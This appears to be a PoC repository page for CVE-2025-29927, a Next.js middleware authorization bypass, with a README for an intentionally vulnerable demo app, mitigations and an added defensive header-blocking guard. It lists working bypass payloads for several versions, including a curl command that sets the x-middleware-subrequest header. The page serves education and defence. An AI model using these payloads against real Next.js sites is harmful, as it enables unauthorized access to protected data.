CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
🔓 Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulnerability. ⚠️ For educational use only.
Readme
# Hello World - Next.js 12.2

A simple proof of concept Next.js 12.2 application.

## 🚀 Quick Start

### 1. Install Dependencies
```bash
npm install
```

### 2. Run the Development Server
```bash
npm run dev
```

The application will be available at `http://localhost:3000`


## 🛠️ Available Scripts

- `npm run dev` - Start development server
- `npm run build` - Build for production
- `npm run start` - Start production server

## 🎯 Features

- ✅ **Next.js 12.2** - Latest stable version
- ✅ **React 18.2** - Modern React features
- ✅ **Simple Design** - Clean, responsive UI
- ✅ **Authentication System** - Login with hardcoded credentials
- ✅ **Admin Panel** - Protected dashboard with sensitive data
- ✅ **Vulnerable Middleware** - Demonstrates auth bypass techniques
- ✅ **Exploit Demo** - Easy to reproduce security issues

## 🔧 Customization

Edit `pages/index.js` to modify the Hello World page. The application uses inline styles for simplicity, but you can add CSS files or styling libraries as needed.

## 🔓 CVE-2025-29927 Security Demo

This application demonstrates the **CVE-2025-29927** vulnerability discovered by Rachid.A (zhero) and Yasser Allam (inzo_):

### 📋 Vulnerability Details
- **CVE:** CVE-2025-29927
- **CVSS:** 9.1/10 (Critical)
- **Affected:** Next.js 11.1.4 - 15.2.2
- **Impact:** Complete middleware bypass using `x-middleware-subrequest` header

### 🎯 Demo Credentials
- **Username:** `admin`
- **Password:** `admin`

### 🚨 CVE-2025-29927 Exploit Methods
1. **Browser Extension (ModHeader)** - Add `x-middleware-subrequest: middleware` header
2. **JavaScript Console** - Use fetch with the bypass header
3. **cURL Exploit** - `curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin`
4. **Python Requests** - Add header to bypass middleware completely

### 🔧 Payload Variations
- **Next.js 12.2+:** `x-middleware-subrequest: middleware`
- **With /src directory:** `x-middleware-subrequest: src/middleware`
- **Next.js 15.x:** `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`


### 🛡️ Mitigation
- Update to Next.js 15.2.3+ (14.2.25+ for 14.x)
- Block `x-middleware-subrequest` header at proxy/CDN level
- Implement additional server-side validation
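
One way to apply the last two mitigations together, as an added example that is not part of the PoC repository. The names `guard`, `requireAuth` and `isAuthenticated` are hypothetical, and the guard assumes every request reaching the wrapped listener comes from outside the application.

```javascript
// Added example, not code from the PoC repository.
const BLOCKED_HEADER = 'x-middleware-subrequest';

// Case-insensitive lookup, so the check also works on header maps that were
// not normalised to lower case by Node's HTTP parser.
function findBlockedHeader(headers) {
  const name = Object.keys(headers || {}).find(
    (h) => h.toLowerCase() === BLOCKED_HEADER
  );
  return name === undefined ? null : String(headers[name]);
}

// Layer 1: wrap the request listener that fronts Next.js. A request carrying
// the internal header is refused before the framework handles it.
// Wiring with a custom server: http.createServer(guard(app.getRequestHandler()))
function guard(next, onBlock = () => {}) {
  return function guarded(req, res) {
    const value = findBlockedHeader(req.headers);
    if (value !== null) {
      onBlock({ url: req.url, value }); // hand off to logging or alerting
      res.statusCode = 403;
      res.end('Forbidden');
      return false;
    }
    next(req, res);
    return true;
  };
}

// Layer 2: repeat the session check inside the page's own data function, so
// the protected page does not depend on middleware having run.
// isAuthenticated is a hypothetical session check supplied by the application.
function requireAuth(isAuthenticated, inner = async () => ({ props: {} })) {
  return async function getServerSideProps(ctx) {
    if (!(await isAuthenticated(ctx.req))) {
      return { redirect: { destination: '/login', permanent: false } };
    }
    return inner(ctx);
  };
}
```

In `pages/admin.js` the second layer would be exported as `getServerSideProps = requireAuth(checkSession)`, where `checkSession` stands for whatever session validation the application already performs.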

**⚠️ WARNING: This demonstrates a real CVE for educational purposes only!**

## 📦 Dependencies

- **next**: 12.2.0
- **react**: 18.2.0
- **react-dom**: 18.2.0

## 🎨 Styling

This application uses inline styles for simplicity. For a production app, consider using:
- CSS Modules
- Styled Components
- Tailwind CSS
- Or any other styling solution

---

**Happy coding! 🚀**
File Snapshot

```
[4.0K] /data/pocs/69091069268e6c9bc81ad389414d22b2a8251cec
├── [ 725] middleware.js
├── [ 118] next.config.js
├── [ 268] package.json
├── [ 14K] package-lock.json
├── [4.0K] pages
│   ├── [7.1K] admin.js
│   ├── [4.0K] api
│   │   ├── [ 615] login.js
│   │   └── [ 381] logout.js
│   ├── [  96] _app.js
│   ├── [3.9K] index.js
│   └── [4.3K] login.js
└── [2.6K] README.md

2 directories, 11 files
```